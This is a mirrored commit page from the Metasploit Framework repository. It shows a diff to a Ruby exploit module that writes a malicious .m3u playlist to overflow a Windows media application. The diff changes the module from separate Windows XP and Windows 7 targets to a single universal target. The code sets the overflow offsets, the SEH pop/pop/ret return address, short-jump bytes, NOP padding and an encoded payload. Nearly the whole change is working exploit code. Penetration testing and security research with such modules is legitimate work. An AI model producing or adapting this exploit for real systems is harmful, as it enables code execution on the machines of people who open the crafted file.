1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00

update from dookie.

git-svn-id: file:///home/svn/framework3/trunk@9967 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Mario Ceballos 2010-08-06 23:16:20 +00:00
parent 18f8624a47
commit b50f5fd0fe

View File

@ -1,3 +1,4 @@
##
# $Id$
##
@ -48,8 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Ret' => 0x1001060C, 'Offset' => 43480 } ], # p/p/r in WDfilter03.dll
[ 'Windows 7', { 'Ret' => 0x1001060C, 'Offset' => 43504 } ], # p/p/r in WDfilter03.dll
[ 'Windows Universal', { 'Ret' => 0x1001060C, 'Offset' => 43480 } ], # p/p/r in WDfilter03.dll
],
'Privileged' => false,
'DisclosureDate' => 'Jul 28 2010',
@ -59,20 +59,24 @@ class Metasploit3 < Msf::Exploit::Remote
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']),
], self.class)
end
def exploit
sploit = rand_text_alpha_upper(target['Offset'])
sploit << "\xeb\x16\x90\x90" # Need a little longer jump to get over some cruft
sploit << [target.ret].pack('V')
sploit = rand_text_alpha_upper(43480) # Offset for WinXP
sploit << "\xeb\x20\x90\x90" # Jump to the nops after the 2nd offset
sploit << [target.ret].pack('V') # Offset
sploit << rand_text_alpha_upper(16) # Pad to reach the Win7 Offset
sploit << "\xeb\x0C\x90\x90" # Jump over the cruft
sploit << [target.ret].pack('V') # Offset
sploit << "\x90" * 8
sploit << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end